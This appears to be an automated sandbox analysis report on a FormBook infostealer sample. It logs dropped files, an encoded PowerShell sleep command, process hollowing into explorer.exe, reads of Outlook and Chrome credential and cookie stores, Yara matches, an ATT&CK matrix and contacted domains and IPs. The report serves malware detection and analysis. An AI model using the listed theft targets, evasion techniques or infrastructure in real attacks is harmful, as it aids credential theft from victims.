          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: explorer.exe, 00000004.00000003.535831998.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.552222750.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.386129776.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Users\user\Desktop\SC_0017384.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          Registry Run Keys / Startup Folder          		612
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          PowerShell          		Boot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder          		11
          Deobfuscate/Decode Files or Information          		1
          Input Capture          		13
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
          Obfuscated Files or Information          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration5
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer16
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common31
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items612
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831200 Sample: SC_0017384.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 53 www.funhood.life 2->53 77 Snort IDS alert for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 3 other signatures 2->83 11 SC_0017384.exe 16 7 2->11         started        signatures3 process4 dnsIp5 61 a.uguu.se 188.40.83.211, 443, 49698, 49700 HETZNER-ASDE Germany 11->61 47 C:\Users\user\AppData\...\Lvdnyvcvr.exe, PE32 11->47 dropped 49 C:\Users\...\Lvdnyvcvr.exe:Zone.Identifier, ASCII 11->49 dropped 51 C:\Users\user\AppData\...\SC_0017384.exe.log, ASCII 11->51 dropped 103 Encrypted powershell cmdline option found 11->103 105 Injects a PE file into a foreign processes 11->105 16 SC_0017384.exe 11->16         started        19 powershell.exe 16 11->19         started        file6 signatures7 process8 signatures9 69 Modifies the context of a thread in another process (thread injection) 16->69 71 Maps a DLL or memory area into another process 16->71 73 Sample uses process hollowing technique 16->73 75 Queues an APC in another process (thread injection) 16->75 21 explorer.exe 6 5 16->21 injected 25 conhost.exe 19->25         started        process10 dnsIp11 55 www.emprendizajesocial.com 217.160.0.229, 49703, 49704, 80 ONEANDONE-ASBrauerstrasse48DE Germany 21->55 57 www.findmyoriginstory.com 74.208.236.131, 49702, 80 ONEANDONE-ASBrauerstrasse48DE United States 21->57 59 5 other IPs or domains 21->59 85 System process connects to network (likely due to code injection or exploit) 21->85 27 Lvdnyvcvr.exe 